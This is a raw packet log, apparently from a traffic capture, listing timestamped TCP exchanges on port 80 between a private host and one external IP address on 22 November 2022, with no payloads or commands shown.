                                                                                Nov 22, 2022 05:10:34.215039015 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:34.215080976 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:34.215095043 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:34.215183020 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:34.215240955 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:34.215240955 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:34.215365887 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:34.215423107 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:34.215460062 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:34.215533018 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:34.215574026 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:34.215586901 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:34.215703964 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:34.215760946 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:34.215764046 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:34.215857029 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:34.215923071 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:34.215923071 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:34.216017962 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:34.216073036 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:34.728773117 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:34.957385063 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:35.087711096 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:35.087922096 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:36.634053946 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:36.678361893 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:36.678597927 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:36.790502071 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:36.790563107 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:36.790700912 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:36.944937944 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:36.945034981 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:36.945065975 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:36.945209026 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.099613905 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.099693060 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.099735022 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.099790096 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.099790096 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.254143000 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.254226923 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.254267931 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.254307032 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.254345894 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.254384995 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.254456997 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.254456997 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.254456997 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.293834925 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.408725023 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.408786058 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.408884048 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.408948898 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.409006119 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.409025908 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.409025908 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.409048080 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.409086943 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.409097910 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.409230947 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.409291983 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.448422909 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.563298941 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.563374996 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.563427925 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.563469887 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.563527107 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.563544989 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.563545942 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.563582897 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.563596010 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.563623905 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.563676119 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.563761950 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.563819885 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.563860893 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.563874006 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.563971996 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.564027071 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.718019962 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.718125105 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.718183994 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.718241930 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.718260050 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.718281031 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.718338013 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.718338966 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.718388081 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.718399048 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.718439102 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.718477011 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.718509912 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.718621016 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.718662024 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.718674898 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.718842983 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.718899012 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.718916893 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.718980074 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.719024897 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.719029903 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.719077110 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.719132900 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.719134092 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.719284058 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.719341040 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.872813940 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.872890949 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.872931957 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.872999907 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.873012066 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.873059034 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.873064995 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.873110056 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.873148918 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.873164892 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.873193979 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.873243093 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.873245955 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.873413086 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.873467922 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.873471975 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.873528957 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.873568058 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.873579979 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.873662949 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.873758078 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.873764992 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.873876095 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.873927116 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.873969078 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.874027014 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.874078035 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.874203920 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.874274969 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.874315023 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.874324083 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:37.874454021 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:37.874505043 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.029047012 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.029123068 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.029162884 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.029218912 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.029217958 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.029258966 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.029272079 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.029319048 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.029376030 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.029378891 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.029416084 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.029469967 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.029470921 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.029510975 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.029548883 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.029561996 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.029608011 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.029664993 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.029666901 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.029822111 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.029861927 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.029874086 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.029917002 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.029970884 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.030011892 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.030158043 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.030210972 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.030217886 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.030273914 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.030327082 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.030363083 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.030481100 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.030544996 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.184053898 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.184175968 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.184231043 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.184290886 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.184302092 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.184330940 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.184360981 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.184377909 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.184438944 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.184447050 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.184509039 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.184550047 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.184580088 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.184606075 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.184644938 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.184669971 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.184690952 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.184741974 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.184755087 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.184894085 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.184952021 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.184958935 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.184994936 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.185060024 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.185089111 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.185179949 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.185257912 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.185269117 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.185389042 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.185456991 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.185478926 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.185570955 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.185647011 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.185661077 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.185750961 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.185811043 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.339060068 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.339121103 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.339181900 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.339216948 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.339240074 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.339281082 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.339294910 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.339337111 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.339375973 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.339385986 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.339421034 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.339471102 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.339476109 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.339621067 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.339677095 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.339679003 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.339719057 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.339809895 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.339843988 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.339865923 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.339919090 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.340023994 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.340079069 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.340136051 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.340224981 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.340270996 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.340327978 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.340405941 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.340445995 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.340501070 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.340503931 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.340636969 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.340676069 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.340714931 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.340785027 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.340842962 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.493604898 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.493658066 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.493685007 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.493711948 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.493782997 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.493861914 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.493941069 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.493993998 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.493993998 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.494086981 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.494116068 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.494183064 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.494247913 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.494314909 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.494376898 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.494446039 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.494508982 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.494545937 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.494611979 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.494657993 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.494739056 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.494810104 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.494817019 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.494910002 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.494977951 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.494977951 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.495104074 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.495176077 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.495186090 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.495242119 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.495307922 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.495346069 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.495464087 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.495533943 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.495548964 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.495614052 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.495681047 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.648366928 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.648418903 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.648489952 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.648529053 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.648535967 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.648585081 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.648591995 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.648636103 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.648689032 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.648772001 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.648813009 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.648866892 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.648952961 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.649013042 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.649053097 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.649065971 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.649250984 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.649293900 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.649352074 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.649441957 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.649509907 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.649522066 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.649550915 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.649617910 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.649666071 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.649749041 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.649804115 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.649808884 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.649842978 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.649899006 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.650010109 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.650053024 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.650105953 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.650202990 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.650252104 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.650316954 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.650365114 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.650404930 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.650466919 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.803071022 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.803142071 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.803205013 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.803267002 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.803344965 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.803358078 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.803406954 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.803416967 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.803483009 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.803534985 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.803546906 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:38.803602934 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:38.803652048 CET8049180183.78.168.24192.168.2.22
